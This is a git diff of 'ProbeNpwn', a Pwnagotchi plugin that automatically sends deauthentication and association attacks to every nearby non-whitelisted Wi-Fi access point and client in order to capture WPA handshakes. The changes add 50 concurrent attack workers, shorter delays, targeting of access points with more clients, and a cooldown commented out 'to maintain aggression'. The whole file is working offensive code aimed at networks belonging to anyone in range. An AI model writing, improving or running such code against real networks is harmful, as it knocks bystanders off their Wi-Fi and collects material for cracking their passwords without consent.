diff --git a/probenpwn.py b/probenpwn.py index 0819b65..2977c1a 100644 --- a/probenpwn.py +++ b/probenpwn.py @@ -5,113 +5,141 @@ import os import subprocess import random import pwnagotchi.plugins as plugins +import pwnagotchi.ui.components as components +from concurrent.futures import ThreadPoolExecutor -class probenpwn(plugins.Plugin): +class ProbeNpwn(plugins.Plugin): __author__ = 'AlienMajik' - __version__ = '1.1.2' + __version__ = '1.1.3' # Updated to reflect enhancements __license__ = 'GPL3' __description__ = ( - 'Pwn more aggressively. Launch immediate associate or deauth attack ' - 'when bettercap spots a device, with enhanced performance for more handshakes. ' - 'Enhanced with dynamic parameter tuning, randomization, and feedback loop.' + 'Aggressively capture handshakes by launching immediate associate and deauth attacks ' + 'on detected devices. Features minimized delays, retry mechanisms, target prioritization, ' + 'concurrency throttling, and channel coordination for maximum efficiency.' ) def __init__(self): logging.debug("ProbeNpwn plugin created") self.old_name = None - self.recents = {} - self.attack_threads = [] - self.epoch_duration = 60 # default epoch duration in seconds + self.recents = {} # Track recent APs and clients + self.executor = ThreadPoolExecutor(max_workers=50) # Throttle to 50 concurrent attacks (Enhancement 4) self._watchdog_thread = None self._watchdog_thread_running = True - # Track number of attack attempts per AP MAC address - self.attack_attempts = {} - # Optionally, track the number of successful handshakes per AP - self.success_counts = {} - # Track the total number of successful and failed handshakes for feedback loop + self.attack_attempts = {} # Track attack attempts per AP + self.success_counts = {} # Track successful handshakes per AP self.total_handshakes = 0 self.failed_handshakes = 0 - # Track the performance of each AP for dynamic adjustments self.performance_stats = {} self.whitelist = set() - + self.cooldowns = {} # Cooldown periods per AP after handshake + self.epoch_duration = 60 # Default epoch duration in seconds + self.ap_clients = {} # Track number of clients per AP for prioritization (Enhancement 3) + # UI-related attributes + self.attacks_x = 10 + self.attacks_y = 20 + self.success_x = 10 + self.success_y = 30 + self.ui_initialized = False + def on_loaded(self): - logging.info(f"Plugin ProbeNpwn loaded") + """Log plugin load event.""" + logging.info("Plugin ProbeNpwn loaded") - def on_config_changed(self, config): - """Load the whitelist from Pwnagotchi's global config.""" - try: - self.whitelist = set(config["main"].get("whitelist", [])) - except KeyError: - self.whitelist = set() - logging.info(f"Whitelist loaded from Pwnagotchi config: {self.whitelist}") + def on_config_changed(self, config): + """Load whitelist, verbose setting, and UI coordinates from config.""" + self.whitelist = set(config["main"].get("whitelist", [])) + logging.info(f"Whitelist loaded from config: {self.whitelist}") - try: - self.debug_log_path = config["main"]["log"].get("path-debug", None) - except KeyError: - logging.error(f"Failed to configure debug log path") + self.verbose = config.get("main", {}).get("plugins", {}).get("probenpwn", {}).get("verbose", False) + if self.verbose: + logging.getLogger().setLevel(logging.INFO) + logging.info("Verbose mode enabled, logging level set to INFO") + else: + logging.getLogger().setLevel(logging.WARNING) + logging.warning("Verbose mode disabled, logging level set to WARNING") self.old_name = config.get("main").get("name", "") + self.attacks_x = config.get("main.plugins.probenpwn.attacks_x_coord", 10) + self.attacks_y = config.get("main.plugins.probenpwn.attacks_y_coord", 20) + self.success_x = config.get("main.plugins.probenpwn.success_x_coord", 10) + self.success_y = config.get("main.plugins.probenpwn.success_y_coord", 30) def on_unload(self, ui): + """Clean up on unload: restore name, stop watchdog, shutdown thread pool, remove UI elements.""" with ui._lock: if self.old_name: ui.set('name', f"{self.old_name}>") + ui.remove_element('attacks') + ui.remove_element('success') - try: - self._watchdog_thread_running = False # properly exit the thread + self._watchdog_thread_running = False + if self._watchdog_thread: self._watchdog_thread.join() - except AttributeError: # Handle unload before on_ready() - pass + self.executor.shutdown(wait=True) logging.info("Probing out.") + def on_ui_setup(self, ui): + """Set up custom UI elements for attacks and success rate.""" + if not self.ui_initialized: + ui.add_element('attacks', components.Text( + position=(self.attacks_x, self.attacks_y), + value='Attacks: 0', + color=255 + )) + ui.add_element('success', components.Text( + position=(self.success_x, self.success_y), + value='Success: 0.0%', + color=255 + )) + logging.info("Custom UI elements 'attacks' and 'success' initialized.") + self.ui_initialized = True + def on_ui_update(self, ui): - if ui.get('name').endswith("!!!"): # No need to to update - return - if self.old_name: - with ui._lock: - ui.set('name', f"{self.old_name}!!!") + """Update UI with current attack counts and success rate.""" + total_attempts = sum(self.attack_attempts.values()) + total_successes = sum(self.success_counts.values()) + success_rate = (total_successes / total_attempts) * 100 if total_attempts > 0 else 0.0 + + with ui._lock: + ui.set('attacks', f"Attacks: {total_attempts}") + ui.set('success', f"Success: {success_rate:.1f}%") def on_ready(self, agent): + """Start watchdog and set initial status on agent ready.""" logging.info("Probed and Pwnd!") agent.run("wifi.clear") self._watchdog_thread = threading.Thread(target=self._watchdog, daemon=True) self._watchdog_thread.start() - with agent._view._lock: # agent._view is the same as th variable "ui" + with agent._view._lock: agent._view.set("status", "Probe engaged... \nPWNing your signals, Earthlings!") def _watchdog(self): - CHECK_INTERVAL = 5 # seconds between checks + """Monitor system health and attempt recovery before restarting service.""" + CHECK_INTERVAL = 5 + MAX_RETRIES = 1 + retry_count = 0 while self._watchdog_thread_running: - # Check for wlan0mon interface missing if not os.path.exists("/sys/class/net/wlan0mon"): - logging.error("wlan0mon interface missing! This likely indicates a Wi‑Fi adapter crash. " - "Executing 'sudo systemctl restart pwnagotchi' to recover.") + logging.error("wlan0mon missing! Attempting Wi-Fi restart...") try: - subprocess.run(["systemctl", "restart", "pwnagotchi"], check=True) - logging.info("pwnagotchi service restarted successfully.") + subprocess.run(["ip", "link", "set", "wlan0mon", "down"], check=True) + subprocess.run(["ip", "link", "set", "wlan0mon", "up"], check=True) + logging.info("Wi-Fi interface restarted.") + retry_count = 0 except Exception as e: - logging.error("Failed to execute restart command: %s", e) - break # Stop checking after issuing the recovery command. - - # Check for 'wifi.interface not set or not found' error in logs - try: - with open(self.debug_log_path, 'r') as log_file: - logs = log_file.read() - if "error 400: wifi.interface not set or not found" in logs: - logging.error("wifi.interface not set or not found! Restarting pwnagotchi to recover.") - try: - subprocess.run(["systemctl", "restart", "pwnagotchi"], check=True) - logging.info("pwnagotchi service restarted successfully.") - except Exception as e: - logging.error("Failed to restart pwnagotchi service: %s", e) - break # Stop checking after issuing the recovery command. - except Exception as e: - logging.error("Error in watchdog: %s", repr(e)) - + retry_count += 1 + if retry_count >= MAX_RETRIES: + logging.error(f"Wi-Fi restart failed after {MAX_RETRIES} attempts: {e}. Restarting Pwnagotchi...") + subprocess.run(["systemctl", "restart", "pwnagotchi"]) + break + else: + logging.warning(f"Wi-Fi restart attempt {retry_count} failed: {e}. Retrying in {CHECK_INTERVAL} seconds...") + else: + retry_count = 0 time.sleep(CHECK_INTERVAL) def track_recent(self, ap, cl=None): + """Track recently seen APs and clients with timestamps.""" ap['_track_time'] = time.time() self.recents[ap['mac'].lower()] = ap if cl: @@ -119,158 +147,162 @@ class probenpwn(plugins.Plugin): self.recents[cl['mac'].lower()] = cl def ok_to_attack(self, agent, ap): - # Check if the AP is in the whitelist loaded from the global config + """Check if an AP or client is safe to attack (not whitelisted).""" if ap.get('hostname', '').lower() in self.whitelist or ap['mac'].lower() in self.whitelist: return False return True def attack_target(self, agent, ap, cl): + """Launch attack on target AP/client with dynamic parameters.""" + ap_mac = ap['mac'].lower() + if ap_mac in self.cooldowns and time.time() < self.cooldowns[ap_mac]: + logging.debug(f"AP {ap_mac} on cooldown. Skipping attack.") + return + if not self.ok_to_attack(agent, ap): return - ap_mac = ap['mac'].lower() + + # Ensure channel is set before attack (Enhancement 5) + agent.set_channel(ap['channel']) + self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1 - logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}") - - # Adjust attack parameters dynamically based on performance feedback + logging.info(f"Attacking AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}") + self.adjust_attack_parameters(ap_mac) - if cl: + if cl and agent._config['personality']['deauth']: delay = self.dynamic_attack_delay(ap, cl) agent.deauth(ap, cl, delay) - agent.associate(ap, 0.2) + if agent._config['personality']['associate']: + agent.associate(ap, 0.1) # Reduced delay for faster association (Enhancement 1) def dynamic_attack_delay(self, ap, cl): - signal = cl.get('signal', -100) if cl is not None else -100 - if signal < -60: - base_delay = 0.5 - else: - base_delay = 0.25 + """Calculate adaptive delay with minimized values and retry mechanism (Enhancements 1 & 2).""" + signal = cl.get('signal', -100) if cl else -100 + base_delay = 0.1 if signal >= -60 else 0.2 # Minimized base delays (Enhancement 1) ap_mac = ap['mac'].lower() attempts = self.attack_attempts.get(ap_mac, 0) - if attempts > 10: - base_delay *= 0.6 - elif attempts > 5: + # Retry mechanism: reduce delay aggressively after failed attempts (Enhancement 2) + if attempts > 5: + base_delay *= 0.4 # 40% of base delay after 5 attempts + elif attempts > 2: + base_delay *= 0.6 # 60% of base delay after 2 attempts + + # Prioritize APs with more clients by further reducing delay (Enhancement 3) + num_clients = self.ap_clients.get(ap_mac, 0) + if num_clients > 3: # High-value target with >3 clients base_delay *= 0.8 randomized_delay = base_delay * random.uniform(0.9, 1.1) - logging.debug(f"Dynamic attack delay for AP {ap['mac']} (signal {signal} dBm, {attempts} attempts): {randomized_delay:.3f}s") + logging.debug(f"Dynamic delay for AP {ap['mac']} (signal {signal}dBm, {attempts} attempts, {num_clients} clients): {randomized_delay:.3f}s") return randomized_delay def adjust_attack_parameters(self, ap_mac): - """Adjust attack parameters based on performance metrics (success/failure rate)""" - if ap_mac not in self.performance_stats: - self.performance_stats[ap_mac] = {'success_rate': 0, 'failure_rate': 0, 'last_success': 0} - + """Tune attack aggression based on adaptive success thresholds.""" success_count = self.success_counts.get(ap_mac, 0) attack_count = self.attack_attempts.get(ap_mac, 0) - - # Calculate success rate - if attack_count > 0: - success_rate = (success_count / attack_count) * 100 - else: - success_rate = 0 - - # Update performance stats - self.performance_stats[ap_mac]['success_rate'] = success_rate - self.performance_stats[ap_mac]['failure_rate'] = 100 - success_rate - - # Dynamically adjust attack tactics based on success rate - if success_rate < 20: # Success rate below 20% indicates a need for more aggressive tactics - logging.info(f"Low success rate ({success_rate:.2f}%) on AP {ap_mac}. Making attack more aggressive.") - # Increase the attack frequency - self.attack_attempts[ap_mac] += 5 # Increase attempts - elif success_rate > 80: # Success rate above 80% means the attack is effective - logging.info(f"High success rate ({success_rate:.2f}%) on AP {ap_mac}. Reducing attack aggressiveness.") - # Slow down the attack to avoid detection - self.attack_attempts[ap_mac] = max(1, self.attack_attempts[ap_mac] - 2) # Reduce attempts - else: - logging.info(f"Moderate success rate ({success_rate:.2f}%) on AP {ap_mac}. Maintaining current attack tactics.") - + success_rate = (success_count / attack_count) * 100 if attack_count > 0 else 0 + + total_success = sum(self.success_counts.values()) + total_attempts = sum(self.attack_attempts.values()) + avg_success_rate = (total_success / total_attempts) * 100 if total_attempts > 0 else 0 + + low_threshold = avg_success_rate * 0.5 # 50% of average + high_threshold = avg_success_rate * 1.5 # 150% of average + + if success_rate < low_threshold: + logging.info(f"Low success rate ({success_rate:.2f}%) on {ap_mac}. Increasing aggression.") + self.attack_attempts[ap_mac] += 5 + elif success_rate > high_threshold: + logging.info(f"High success rate ({success_rate:.2f}%) on {ap_mac}. Reducing aggression.") + self.attack_attempts[ap_mac] = max(1, self.attack_attempts[ap_mac] - 2) + def on_bcap_wifi_ap_new(self, agent, event): + """Handle new AP detection with immediate attack.""" try: ap = event['data'] - if agent._config['personality']['associate'] and self.ok_to_attack(agent, ap): - logging.debug("insta-associate: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac']) - attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, None)) - attack_thread.start() - self.attack_threads.append(attack_thread) + ap_mac = ap['mac'].lower() + self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) # Initialize client count (Enhancement 3) + if self.ok_to_attack(agent, ap): + logging.info(f"ProbeNpwn: Targeting new AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']})") + self.executor.submit(self.attack_target, agent, ap, None) + else: + logging.debug(f"ProbeNpwn: Skipping new AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) - whitelisted or invalid") except Exception as e: - logging.error("Error in on_bcap_wifi_ap_new: %s", repr(e)) + logging.error(f"ProbeNpwn: Error in on_bcap_wifi_ap_new: {repr(e)}") def on_bcap_wifi_client_new(self, agent, event): + """Handle new client detection with immediate deauth attack.""" try: ap = event['data']['AP'] cl = event['data']['Client'] - if (agent._config['personality']['deauth'] and - self.ok_to_attack(agent, ap) and - self.ok_to_attack(agent, cl)): - logging.debug("insta-deauth: %s (%s) -> '%s' (%s) (%s)", - ap.get('hostname', 'Unknown AP'), ap['mac'], - cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor']) - attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, cl)) - attack_thread.start() - self.attack_threads.append(attack_thread) + ap_mac = ap['mac'].lower() + # Increment client count for prioritization (Enhancement 3) + self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1 + if self.ok_to_attack(agent, ap) and self.ok_to_attack(agent, cl): + logging.info(f"ProbeNpwn: Targeting new client {cl.get('hostname', 'Unknown Client')} ({cl['mac']}) on AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']})") + self.executor.submit(self.attack_target, agent, ap, cl) + else: + logging.debug(f"ProbeNpwn: Skipping new client {cl.get('hostname', 'Unknown Client')} ({cl['mac']}) on AP {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) - whitelisted or invalid") except Exception as e: - logging.error("Error in on_bcap_wifi_client_new: %s", repr(e)) + logging.error(f"ProbeNpwn: Error in on_bcap_wifi_client_new: {repr(e)}") def on_handshake(self, agent, filename, ap, cl): + """Handle successful handshake capture with cooldown and log success rate.""" ap_mac = ap['mac'].lower() - logging.info("Handshake detected from %s", ap['mac']) - if ap_mac in self.attack_attempts: - del self.attack_attempts[ap_mac] + logging.info(f"Handshake captured from {ap['mac']}") self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1 self.total_handshakes += 1 + attempts = self.attack_attempts.get(ap_mac, 0) + if attempts > 0: + success_rate = 100.0 / attempts + logging.info(f"Success rate for handshake from {ap['mac']}: {success_rate:.2f}% (took {attempts} attempts)") + else: + logging.info(f"Handshake captured from {ap['mac']} with no recorded attempts.") + + if ap_mac in self.attack_attempts: + del self.attack_attempts[ap_mac] + + # Cooldown logic commented out to maintain aggression + # self.cooldowns[ap_mac] = time.time() + 5 + if 'mac' in ap and 'mac' in cl: - logging.info("Captured handshake from %s (%s) -> '%s' (%s) (%s)", - ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor']) + logging.info(f"Captured handshake: {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) -> " + f"'{cl.get('hostname', 'Unknown Client')}' ({cl['mac']}) ({cl['vendor']})") if ap_mac in self.recents: del self.recents[ap_mac] cl_mac = cl['mac'].lower() if cl_mac in self.recents: del self.recents[cl_mac] - # Expanded Feedback Loop: Tracking success/failure rates - handshake_rate = (self.success_counts.get(ap_mac, 0) / self.attack_attempts.get(ap_mac, 1)) * 100 - logging.info(f"Success rate for {ap['mac']}: {handshake_rate:.2f}%") - failure_rate = 100 - handshake_rate - logging.info(f"Failure rate for {ap['mac']}: {failure_rate:.2f}%") - def on_epoch(self, agent, epoch, epoch_data): + """Clean up old entries in recents based on epoch duration.""" for mac in list(self.recents): if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)): del self.recents[mac] def on_bcap_wifi_ap_updated(self, agent, event): + """Track updated APs.""" try: ap = event['data'] if self.ok_to_attack(agent, ap): - logging.debug("AP updated: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac']) + logging.debug(f"AP updated: {ap.get('hostname', 'Unknown AP')} ({ap['mac']})") self.track_recent(ap) except Exception as e: - logging.error("Error in on_bcap_wifi_ap_updated: %s", repr(e)) + logging.error(f"Error in on_bcap_wifi_ap_updated: {repr(e)}") def on_bcap_wifi_client_updated(self, agent, event): + """Track updated clients.""" try: ap = event['data']['AP'] cl = event['data']['Client'] + ap_mac = ap['mac'].lower() + self.ap_clients[ap_mac] = self.ap_clients.get(ap_mac, 0) + 1 # Update client count (Enhancement 3) if self.ok_to_attack(agent, ap) and self.ok_to_attack(agent, cl): - logging.debug("Client updated: %s (%s) -> '%s' (%s) (%s)", - ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor']) + logging.debug(f"Client updated: {ap.get('hostname', 'Unknown AP')} ({ap['mac']}) -> " + f"'{cl.get('hostname', 'Unknown Client')}' ({cl['mac']}) ({cl['vendor']})") self.track_recent(ap, cl) except Exception as e: - logging.error("Error in on_bcap_wifi_client_updated: %s", repr(e)) - - def sanitize_channel_list(self, channels): - """ - Sanitize the channel list to ensure only valid channels are included. - Channels for 2.4 GHz should be between 1 and 14, and for 5 GHz, it should be between 36 and 165. - """ - valid_channels = [ch for ch in channels if 1 <= ch <= 14 or 36 <= ch <= 165] - if not valid_channels: - logging.error("No valid channels to scan.") - return [] # Return an empty list if no valid channels are found - logging.debug(f"Scanning the following valid channels: {valid_channels}") - return valid_channels - + logging.error(f"Error in on_bcap_wifi_client_updated: {repr(e)}")